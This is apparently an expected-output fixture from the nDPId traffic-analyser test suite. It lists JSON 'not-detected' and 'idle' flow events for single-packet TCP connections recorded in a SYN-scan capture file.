-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":840,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2967,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":840,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9110,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":907,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2967,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":907,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2968,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2968,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7070,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7070,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1047,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1047,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
